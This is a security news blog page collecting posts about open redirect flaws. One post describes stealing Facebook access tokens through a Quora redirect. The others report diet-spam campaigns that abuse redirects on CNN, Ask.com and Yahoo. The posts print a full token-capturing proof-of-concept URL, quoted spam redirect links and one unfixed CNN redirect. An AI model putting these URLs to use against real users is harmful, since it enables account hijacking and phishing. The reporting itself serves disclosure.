Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Open Redirect vulnerability. Show all posts

Researcher found a way to Hack Facebook accounts with the help of Quora


An Indian Security researcher Prakhar Prasad has found a way to hack the facebook accounts by exploiting an open redirection flaw in Quora - one of the famous Question&Answer website.

Quora allows users to be signed up through facebook account.  While signing up for the quora, researcher noticed quora.com was permitted to receive access token from facebook oAuth.

Prasad has managed to steal the access token from the quora website by exploiting an open-redirect security flaw in the quora.com

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

"Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token" researcher said in his blog.

In this case , the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora".  So the request will redirect user to the above URL with access token which further redirects to the prasad's page(exploiting open-redirect flaw).  The page created by prasad successfully captures the access token and direct users to the facebook.com

Unwitting users who follow the POC link soon find themself victim to the facebook account hack.

Complete technical details can be found in his personal blog.

You can also check out the video demo here:


Quora patched the security flaw few days after the Prasad reported the bug.

Diet Spam now exploits ask.com open redirect vulnerability


Yes, One can not simply ignore Open Redirect vulnerability.  Those who think open-redirect vulnerability is not a critical bug , the recent spam campaign will be the best example for how the low severity bugs can be abused by cybercriminals.

"These issues are not a direct threat to the site itself. Users are targets - sites should protect them, " Security researcher Janne Ahlberg said.

A few days ago we reported spammers exploits the CNN's open redirect vulnerability to spread the diet spam. CNN successfully fixed the bug after we have managed to contact CNN with the help of Mikko Hyppönen.

However, I know fixing the bug in CNN is not going to stop the campaign. There are plenty of top websites are vulnerable to Open-redirect security flaw.  So, CyberCriminals always find another open door once we close the door.

Today, We got notified by Janne that attackers are now exploiting the open redirect bug in Ask.com - One of the Top web search engine which has alexa rank 29.


The attackers are using the same tweets content but have managed to change the link.

"I plan to lose atleast 40 pounds with your diet program! hxxx://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&sv=0a5c407b&ip=5f19241a&id=94E847AC91F239E2B20A30571533AFB0&q=How+long+did+Mark+Twain+insist+his+life+story+go+unpublished%3F&p=1&qs=3045&ac=254&g=1a39vz0X%y%zxm&en=qotd&io=0&ep=&eo=&b=a001&bc=&br=&tp=171&ec=1&pt=hxxx://tumblrhealth.me&ex=&url=&u=hxxx://tumblrhealth.me …"

Apparently, the vulnerability was reported by a security researcher sony in 2010 to the company , but they failed to fix it. 

I have also discovered CNN has one more unfixed open redirect security flaw :
"http://cgi.money.cnn.com/tools/redirect.jsp?url=http://www.google.com"

There are plenty of websites fail to take care of their website security.  They don't even have an email address or a contact form to send our bug reports.  It is time to create an email address especially for reporting bugs.  Eg: Security@ Your-site .com

CyberCriminals leverage CNN Open Redirect vulnerability for spreading spam

Today, I(@BreakTheSec) came across a diet spam campaign that leverages the open redirect vulnerability in one of the top News organization CNN.

"The diet porgram you told us about yesterday is soo good! hxxx://cgi.cnn.com/cgi-bin/redir?URL=hxxx://tumblrhealth.me" One of the tweets posted from the spammers' twitter account reads.

The tweet apparently shows cyber criminals managed to leverage the open redirect security flaw in the CNN to redirect twitter users to the Diet spam websites.


"I love myself even more after I started your diet porgram [link]" spam tweets read.  "Yahoo made an article about how amazing your new diet program is!! You look amazing" 

The technique provides several advantages to the cybercriminals including 
  • Getting trust of users
  • URL filtering won't block users from accessing the url because the request goes to CNN.  CNN website then redirects the user to scam website. 

 After further research, i discovered the spammers has also managed to exploit the open redirection security flaw in Yahoo.

"hxxx://us.ard.yahoo.com/SIG=15ohh3h62/M=722732.13975606.14062129.13194555/D=regst/S=150002347:R2/Y=YAHOO/EXP=1275539597/L=hnNys0Kjqbp5Cok8Sr10cAJDTPYa3UwHFG0AANhn/B=VSDoPmKJiUs-/J=1275532397077354/K=rS6pwy3MN2NPP7SBqBCOAQ/A=6097785/R=0/SIG=11o4aqdmv/*hxxx://bit.ly/HealthDiet2"
This is not the first time the CNN website is being abused by cyber criminals.  In 2010, the spammers managed to exploit the open-redirect vulnerability in "ads.cnn.com".

*Update: security researcher Janne Ahlberg ‏discovered @50Cent who has 7.6M followers fell victim to this spam campaign and retweeted the spam tweet:


The screenshot apparently shows the tweet posted on 23rd May 2013.  At the time of writing, the tweet still appears in the account.

*Update 2:
It appears cybercriminals' campaign getting success which mentions various celebrities and media organizations in their tweets - one more celebrity falls victim to the spam campaign.

"“@honshadey: @ChiefKeef So happy you released a diet program! THANKS! hxxx://cgi.cnn.com/cgi-bin/redir?URL=hxxx://tumblrhealth.me …”Bitch U Know i aint Got no Diet Program 😒"  Keith Cozart better known by his stage name Chief Keef , American rapper from Chicago, replied to the spam tweet.

Unfortunately , more than 400 followers has retweeted the post that helps the spammers to spread their campaign.